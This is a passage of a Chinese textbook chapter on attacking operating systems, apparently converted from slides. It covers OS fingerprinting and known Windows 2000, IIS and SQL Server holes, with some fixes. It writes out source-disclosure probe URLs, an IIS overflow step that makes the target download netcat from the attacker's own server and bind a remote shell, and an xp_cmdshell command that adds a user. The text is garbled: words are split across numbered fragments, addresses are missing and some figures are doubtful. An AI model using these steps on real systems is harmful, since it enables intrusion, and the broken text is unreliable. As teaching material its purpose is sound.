信息系统攻击与防御(第五章)

1、第五章 针对操作系统的攻击 识别操作系统 操作系统抗攻击能力 对操作系统的攻击 内容简介操作系统是管理终端系统资源的核心部件，不同的系统，其工作原理不一样，所以不同的入侵工具只能针对相应的操作系统。因此，在整个攻击过程中对操作系统类型的判断、识别以及攻击是最基本也是很关键的一步。本章介绍了在攻击过程中识别操作系统的一些方法，并比较了几种操作系统抗攻击的能力，介绍了攻击操作系统的一些实例。5.1.识别操作系统 用ping来识别操作系统 根据连接端口返回的信息识别操作系统 利用专门的软件来识别操作系统 5.1.1.用ping来识别操作系统 用ping根据返回的ICMP报文的TTL值来识别操作系统，

2、是一种最简单的方法。例如：C：ping Pinging with 32 bytes of data： Reply from ： bytes=32 time10ms TTL=128Reply from ： bytes=32 time10ms TTL=128Reply from ： bytes=32 time10ms TTL=128Reply from ： bytes=32 time5.1.1.用ping来识别操作系统(续) C：ping Pinging with 32 bytes of data：Request timed out.Reply from ： bytes=32 time=250ms

3、 TTL=237Reply from ： bytes=32 time=234ms TTL=237Reply from ： bytes=32 time=234ms TTL=237Ping statistics for ：Packets： Sent = 4， Received = 3， Lost = 1 (25% loss)，Approximate round trip times in milli-seconds：Minimum = 234ms， Maximum = 250ms， Average = 179ms5.1.1.用ping来识别操作系统(续) 根据ICMP报文的TTL的值，就可以大概知

4、道主机的操作系统类型。如：TTL=125左右的主机应该是windows操作系统系列的机器，TTL=235左右的主机应该是UINX操作系统系列的机器。如上面的两个例子，就是装有win2000操作系统的机器，而则是装有UINX（Sunos 5.8）操作系统的机器。这是因为不同操作系统的机器对ICMP报文的处理与应答是有所不同的，TTL值每过一个路由器会减1。所以造成了TTL回复值的不同。对于TTL值与操作系统类型的对应，还要靠大家平时多注意观察和积累。 5.1.2.根据连接端口返回的信息识别操作系统（2）如果机器开了21端口，可以直接FTP上去。例如：C：ftp 如果返回：Connected to

5、 .220 sgyyq-c43s950 Microsoft FTP Service (Version 5.0).User (none)： 那么这肯定就是一台win2000系统的机器了，主机名就是sgyyq-c43s950。这个FTP是windows的IIS自带的一个FTP服务器。如果返回：Connected to .220 Serv-U FTP Server v4.0 for WinSock ready. User (none)：也可以肯定它是windows的机器，因为Serv-U FTP是一个专为windows平台开发的FTP服务器。如果返回：Connected to .220 ready，

6、 dude (vsFTPd 1.1.0： beat me， break me)User (none)：那么这就是一台UINX系统的机器了。5.1.2.根据连接端口返回的信息识别操作系统 (续) 根据连接端口返回的信息识别操作系统是用得最多的一种方法，请看下面几个实例：（1）如果机器开了80端口，可以telnet（如果有NC最好用NC）它的80端口。例如：Microsoft Windows 2000 Version 5.00.2195(C) 版权所有 1985-1998 Microsoft Corp.C：telnet 80输入get 回车（注意这里是盲打）如果返回：HTTP/1.1 400 Ba

7、d RequestServer： Microsoft-IIS/5.0Date： Fri， 11 Jul 2003 02：31：55 GMTContent-Type： text/htmlContent-Length： 87 The parameter is incorrect.C：那么这台就肯定是windows系统的机器。如果返回：Method Not Implementedget to / notsupported.Invalid method in request getApache/1.3.27 Server at Port 80C：那么多数就是UINX系统的机器了。5.1.2.根据连接端

8、口返回的信息识别操作系统 (续) （3）如果开了23端口，直接telnet上去。如果返回：Microsoft (R) Windows (TM) Version 5.00 (Build 2195)Welcome to Microsoft Telnet ServiceTelnet Server Build 5.00.99201.1login：那么这肯定是一台windows的机器了如果返回：SunOS 5.8login：这当然是一台UINX的机器了，并且版本是SunOS 5.8的。5.1.3.利用专门的软件来识别操作系统利用专门的软件可以来识别操作系统，这种有识别操作系统功能的软件，多数采用的是操作

9、系统协议栈识别技术。这是因为不同的厂家在编写自己操作系统时，TCP/IP协议虽然是统一的，但对TCP/IP协议栈是没有做统一的规定的，厂家可以按自己的要求来编写TCP/IP协议栈，从而造成了操作系统之间协议栈的不同。因此可以通过分析协议栈的不同来区分不同的操作系统，只要建立起协议栈与操作系统对应的数据库，就可以准确的识别操作系统了。目前，用这种技术识别操作系统是最准确，也是最科学的。因此也被称为识别操作系统的“指纹技术”。当然识别的能力与准确性，就要看各软件的数据库建立情况了。 5.1.3.利用专门的软件来识别操作系统 (续) 下面是介绍两款有识别功能的软件。（1）nmap，它采用的是主动式探

10、测，探测时会主动向目标系统发送探测包，根据目标目标机回应的数据包来，叛断对方机的操作系统。 （2）天眼，采用的是被动式的探测方法。不向目标系统发送数据包，只是被动地探测网络上的通信数据，通过分析这些数据来判断操作系统的类型。配合supersan使用，效果很好。5.2.操作系统抗攻击能力 网络安全研究机构Still Secure进行一了个称为“Honey Pot”的实验。Still Secure将六台分别装有不同版本的Windows、Linux和苹果Mac操作系统的电脑接入互联网，而且电脑上不安装任何的防毒软件。结论是，没有一台打上最新补丁的电脑因为受到攻击而崩溃。Windows SP2、Lin

11、ux、Mac系统都受到不同程度的攻击，但没有一次攻击能够成功。而Window SP1的安全性能则不令人乐观。 5.3.对操作系统的攻击 Windows 2000漏洞IIS常见漏洞攻防实战 Windows Vista操作系统安全体系 系统安全之SA弱口令 linux下本地溢出漏洞实例 第三方软件的攻击 5.3.1. Windows 2000漏洞 登陆输入法漏洞当启动Windows2000进行到登录验证的提示界面时，任何用户都可以打开各种输入法的帮助栏，并且可以利用其中具有的一些功能访问文件系统，这也就是说可以绕过了Windows2000的用户登录验证机制，并且能以最高管理员权限访问整个系统。 默

12、认的Windows2000系统自带的输入法中有这个漏洞的是：智能ABC，微软拼音，内码，全拼，双拼，郑码。 预防方法：1把不需要的输入法删除掉，例如郑码等。2如果要使用有漏洞的输入法也可以把那个输入法的帮助文件删除掉。这些帮助文件通常在win2000的安装目录下(如:C:WINNT)的help目录下，对应的帮助文件是： WINIME.CHM 输入法操作指南 WINSP.CHM 双拼输入法帮助 WINZM.CHM 郑码输入法帮助 WINPY.CHM 全拼输入法帮助 WINGB.CHM 内码输入法帮助3微软公司对于此问题发布了MS00-069安全公告，并在互联网上给出了简体中文Windows200

13、0和英文版Windows2000的补丁。打上补丁。5.3.1. Windows 2000漏洞（续） 其它漏洞请参见教材自习NetBIOS的信息泄漏 系统崩溃特性 Telnet的拒绝服务攻击 IIS服务泄漏文件内容 MS SQL Server的SA空密码攻击 5.3.2.IIS常见漏洞攻防实战 IIS服务器是一个包含在Microsoft Windows NT服务器操作系统中的Internet文件Microsoft Internet信息和应用程序服务器。IIS可以作为一个Web服务器单独使用，也可以与相兼容的工具一起使用，它可以用来建立Internet商务、访问和操作来自不同数据源的数据以及创建W

14、eb应用程序，其中这些应用程序利用服务器脚本和组件代码来完成一些客户服务器功能。 5.3.2.IIS常见漏洞攻防实战（续） IIS常见漏洞如下：1.Null.htwIIS如果运行了Index Server就包含了一个通过Null.htw有关的漏洞，即服务器上不存在此.htw结尾的文件。这个漏洞会导致显示ASP脚本的源代码，global.asa里面包含了用户账户等敏感信息。如果攻击者提供特殊的URL请求给IIS就可以跳出虚拟目录的限制，进行逻辑分区和ROOT目录的访问。而这个“hit-highlighting”功能在Index Server中没有充分防止各种类型文件的请求，所以导致攻击者访问服务

15、器上的任意文件。Null.htw功能可以从用户输入中获得3个变量：CiWebhitsfileCiRestrictionCiHiliteType5.3.2.IIS常见漏洞攻防实战（续） 2.MDAC- 执行本地命令漏洞IIS的MDAC组件存在一个漏洞，可以导致攻击者远程执行目标系统的命令。问题存在于RDSDatafactory，默认情况下，它允许远程命令发送到IIS服务器中，这命令会以设备用户的身份运行，在默认情况下是System用户。可以通过以下办法测试本机是否存在这个漏洞：c:nc -nw -w 2 目标机 80GET /msadc/msadcs.dll HTTP如果得到下面的信息：appl

16、ication/x_varg就很有可能存在此漏洞且没有打上补丁。5.3.2.IIS常见漏洞攻防实战（续） 3.idc & .ida Bugs这个漏洞实际上类似ASP Dot 漏洞，能在IIS4.0上显示Web目录信息，通过增加.idc或者.ida后缀到URL会导致IIS尝试允许通过数据库连接程序.dll来运行.idc，如果此.idc不存在，它就返回一些信息给客户端。例如，可以用如下命令测试：http:/www.目标机.com/anything.idc 或者 anything.idq4.+.htr Bug这个漏洞是由NSFOCUS发现的，对有些ASA和ASP追加+.htr的URL请求就会导致文件

17、源代码的泄露，例如：http:/www.目标机.com/global.asa+.htr5.3.2.IIS常见漏洞攻防实战（续） 5.NT Site Server Adsamples 漏洞通过请求site.csc，一般保存在/adsamples/config/site.csc中，攻击者可能获得一些如数据库中的DSN，UID和PASS的一些信息，如：http:/www.目标机.com/adsamples/config/site.csc5.3.2.IIS常见漏洞攻防实战（续） 6.IIS HACK有人发现了一个IIS4.0的缓冲溢出漏洞，可以允许用户上载程序，如上载Netcat到目标服务器，并把cm

18、d.exe绑定到80端口。这个缓冲溢出主要存在于.htr，.idc和.stm文件中，其对关于这些文件的URL请求没有对名字进行充分的边界检查，导致运行攻击者插入一些后门程序在系统中下载和执行程序。要检测这样的站点需要两个文件iishack.exe，ncx.exe，另外还需要一台自己的Web服务器，也可以是虚拟服务器。在自己的Web服务器上运行Web服务程序并把ncx.exe放到自己相应的目录下，然后使用Iishack.exe来检查目标机器，例如：c:iishack.exe目标机80你的Web服务器/ncx.exe然后你就使用Netcat来连接你要检测的服务器：c:nc目标机80如果溢出点正确，

19、就可以看到目标机器的命令行提示，并且是远程管理权限。 5.3.2.IIS常见漏洞攻防实战（续） 7.webhits.dll & .htw这个Hit-highligting功能是由Index Server提供的允许一个Web用户在文档上highlighted(突出)其原始搜索的条目，这个文档的名字通过变量CiWebhitsfile传递给.htw文件，Webhits.dll是一个ISAPI应用程序来处理请求，打开文件并返回结果，当用户控制了CiWebhitsfile参数传递给.htw时，就可以请求任意文件，结果就是导致可以查看ASP源码和其他脚本文件内容。例如，可以请求如下条目：http:/www

20、.目标机.com/nosuchfile.htw如果从服务器端获得如下信息：format of the QUERY_STRING is invalid这就表示存在这个漏洞。5.3.2.IIS常见漏洞攻防实战（续） 8.ASP Alternate Data Streams(:$DATA)$DATA这个漏洞是在1998年公布的，$DATA是在NTFS文件系统中存储在文件里面的main data stream属性，通过建立一个特殊格式的URL，就可能使用IIS在浏览器中访问这个data stream，也就显示了文件代码中这些Data Stream和任何文件所包含的数据代码。其中这个漏洞需要下面的几个限

21、制，一是要显示的这个文件需要保存在NTFS文件分区，二是文件需要被ACL设置为全局可读。而且未授权用户需要知道要查看文件名的名字，WIN NT中的IIS1.0， 2.0， 3.0和4.0都存在此问题。微软提供了一个IIS3.0和4.0的版本补丁，要查看一些.asp文件的内容，可以请求如下的URL：http:/www.目标机.com/default.asp:$DATA 就得到了源代码。5.3.2.IIS常见漏洞攻防实战（续） 9.ISM.DLL 缓冲截断漏洞这个漏洞存在于IIS4.0和5.0中，允许攻击者查看任意文件内容和源代码。通过在文件名后面追加近230个+或者%20(这些表示空格)并追加.

22、htr的特殊请求给IIS，会使IIS认为客户端请求的是.htr文件，而把.htr文件的后缀映射到ISM.DLL ISAPI应用程序，这样IIS就把这个.htr请求转交给ISM.DLL文件，然后ISM.DLL程序把传递过来的文件打开和执行，但在ISM.DLL 截断信息之前，缓冲区发送一个断开的.Htr 并会延迟一段时间来返回一些你要打开的文件内容。除非 Web 服务停止并重启过，否则这攻击只能有效执行一次。如果已经发送过一个.htr 请求到机器上，那么这攻击会失效。它只能在ISM.DLL第一次装入内存时工作。例如：http:/www.目标机.com/global.asa%20%20(.=230g

23、lobal.asa.htr5.3.3.Windows Vista操作系统安全体系在Windows Vista进入开发的时候就已经与以前的系统有很大的不同了，在这一整个的开发过程微软始终是把“安全”放在最高的位置上来进行的，Windows Vista的开发引入了Security Development Lifecycl(安全开发生命周期)，这是一个从系统的设计一直到发布都始终贯穿其中的机制，它主要包括十一个流程。 5.3.3.Windows Vista操作系统安全体系(续)服务的强化升级 Internet Explorer 7 保护模式 Windows Defender 防间谍软件 IPSec/

24、Firewall Integration Network Access Protection 网络访问保护 User Account Control用户帐户控制 Bitlocker Drive Encryption/ EFS Smartcard key storage/ RMS client 全新的加密架构 5.3.4.系统安全之SA弱口令存储过程是存储在SQLServer中的预先写好的SQL语句集合，其中危险性最高的扩展存储过程就是xp_cmdshell，它可以执行操作系统的任何指令，而SA是Microsoft SQLServer的管理员帐号，拥有最高权限，它可以执行扩展存储过程，并获得返回值，比如执行： exec master.xp_cmdshell net user test 1234 /a